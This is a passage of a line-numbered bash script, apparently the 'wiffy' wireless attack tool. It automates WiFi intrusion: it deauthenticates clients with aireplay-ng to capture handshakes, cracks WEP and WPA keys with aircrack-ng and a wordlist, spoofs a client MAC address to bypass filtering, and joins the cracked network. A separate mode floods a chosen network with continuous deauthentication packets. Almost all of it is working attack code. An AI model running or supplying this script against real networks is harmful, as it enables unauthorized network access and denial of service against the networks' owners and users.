  598. echo "g0tmi1k" > /tmp/wiffy.tmp
  599. for (( ; ; )) ; do
  600. action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w /tmp/wiffy.tmp -e \"$essid\" > /tmp/wiffy.handshake" $verbose $diagnostics "true"
  601. command=$(cat /tmp/wiffy.handshake | grep "Passphrase not in dictionary" ) #Got no data packets from client network & No valid WPA handshakes found
  602. if [ "$command" ] ; then break; fi
  603. sleep 2
  604. if [ "$loop" != "1" ] ; then
  605. if [ "$loop" != "0" ] ; then findClient $encryption ; fi
  606. sleep 1
  607. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): $client" $diagnostics ; fi
  608. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid -c $client mon0" $verbose $diagnostics "true"
  609. loop="1"
  610. else
  611. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): *everyone*" $diagnostics ; fi
  612. action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid mon0" $verbose $diagnostics "true"
  613. loop="2"
  614. fi
  615. sleep 1
  616. done
  617. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Captured: Handshake" $diagnostics ; fi
  618. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  619. fi
  621. #----------------------------------------------------------------------------------------------#
  622. if [ "$encryption" == "WEP" ] || [ "$encryption" == "WPA" ] ; then
  623. display action "Starting: aircrack-ng" $diagnostics
  624. if [ "$encryption" == "WEP" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|350|30" ; fi
  625. if [ "$encryption" == "WPA" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w $wordlist -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|0|20" ; fi
  626. fi
  628. #----------------------------------------------------------------------------------------------#
  629. action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true"
  630. action "airmon-ng" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  632. #----------------------------------------------------------------------------------------------#
  633. if [ -e "/tmp/wiffy.key" ] ; then
  634. key=$(cat /tmp/wiffy.key)
  635. display info "WiFi key: $key" $diagnostics
  636. #----------------------------------------------------------------------------------------------#
  637. if [ "$extras" == "true" ] ; then
  638. if [ "$client" != "$mac" ] ; then
  639. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Spoofing): $client ('Helps' with MAC filtering) " $diagnostics ; fi
  640. action "airmon-ng" "ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up" $verbose $diagnostics "true"
  641. fi
  642. display action "Joining: $essid" $diagnostics
  643. if [ "$encryption" == "WEP" ] ; then
  644. action "i[f/w]config" "ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up" $verbose $diagnostics "true"
  645. elif [ "$encryption" == "WPA" ] ; then
  646. action "wpa_passphrase" "wpa_passphrase $essid '$key' > /tmp/wiffy.conf" $verbose $diagnostics "true"
  647. action "wpa_supplicant" "wpa_supplicant -B -i $interface -c /tmp/wiffy.conf -D wext" $verbose $diagnostics "true"
  648. fi
  649. sleep 5
  650. action "dhclient" "dhclient $interface" $verbose $diagnostics "true"
  651. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  652. ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
  653. display info "IP: $ourIP" $diagnostics
  654. #gateway=$(route -n | grep $interface | awk '/^ {getline; print $2}')
  655. #display info "Gateway: $gateway" $diagnostics
  656. fi
  657. fi
  658. #----------------------------------------------------------------------------------------------#
  659. elif [ "$encryption" == "WPA" ] ; then
  660. display error "WiFi Key not in wordlist" $diagnostics 1>&2
  661. display action "Moving handshake: $(pwd)/wiffy-$essid.cap" $diagnostics 1>&2
  662. action "Moving capture" "mv -f /tmp/wiffy*.cap $(pwd)/wiffy-$essid.cap" $verbose $diagnostics "true"
  663. #----------------------------------------------------------------------------------------------#
  664. elif [ "$encryption" != "N/A" ] ; then
  665. display error "Something went wrong )=" $diagnostics 1>&2
  666. fi
  669. #----------------------------------------------------------------------------------------------#
  670. elif [ "$mode" == "dos" ] ; then
  671. display action "Attack (DOS): $essid" $diagnostics
  672. command="aireplay-ng --deauth 0 -e \"$essid\" -a $bssid"
  673. if [ "$client" != "clientless" ] ; then command="$command -c $client" ; fi
  674. command="$command $monitorInterface"
  675. action "aireplay-ng (DeAuth)" "$command" $verbose $diagnostics "true" &
  677. #----------------------------------------------------------------------------------------------#
  678. display info "Attacking! CTRL+C to stop" $diagnostics
  679. if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  680. for (( ; ; )) ; do
  681. sleep 5
  682. done
  683. #elif [ "$mode" == "inject" ] ; then
  684. # display action "Attack (Inject): $essid" $diagnostics
  685. # if [ "$encryption" != "WEP" ] ; then display error "Only works on WEP networks" $diagnostics 1>&2 ; cleanup ; fi
  687. #action "aireplay-ng (Inject)" "airtun-ng -a $bssid $monitorInterface" $verbose $diagnostics "true" &
  688. #action "aireplay-ng (Inject)" "ifconfig at0 netmask up" $verbose $diagnostics "true" &
  690. # airmon-ng start wlan0
  691. # /pentest/wireless/airpwn-1.4/airpwn -c conf/greet_html -d rt73 -i mon0 -v
  693. #----------------------------------------------------------------------------------------------#
  694. # display info "Attacking! CTRL+C to stop" $diagnostics
  695. # if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi
  696. # for (( ; ; )) ; do
  697. # sleep 5
  698. # done
  699. fi
  701. #----------------------------------------------------------------------------------------------#
  702. if [ "$diagnostics" == "true" ] ; then echo "-Done!---------------------------------------------------------------------------------------" >> $logFile ; fi
  703. cleanup clean
  706. #---Ideas--------------------------------------------------------------------------------------#
  707. # WEP - Chopchop/FagmentationAP Packet Broadcast
  708. # WPA - aircrack/coWPAtty
  709. # WPA - brute / hash
  710. # WPA - calculate hash
  711. # WPA - use pre hash / use pre capture
  712. # WPA - use folder for wordlist
  713. # WiFi Key is in hex
  714. # update - aircrack/coWPATTY
  715. # decrypt packets - offline & online (airtun-ng)
  716. # Mode - Injection - GET WORKING
  717. # display error "The encryption ($encryption) on $essid isn't support" $diagnostics 1>&2 ; cleanup
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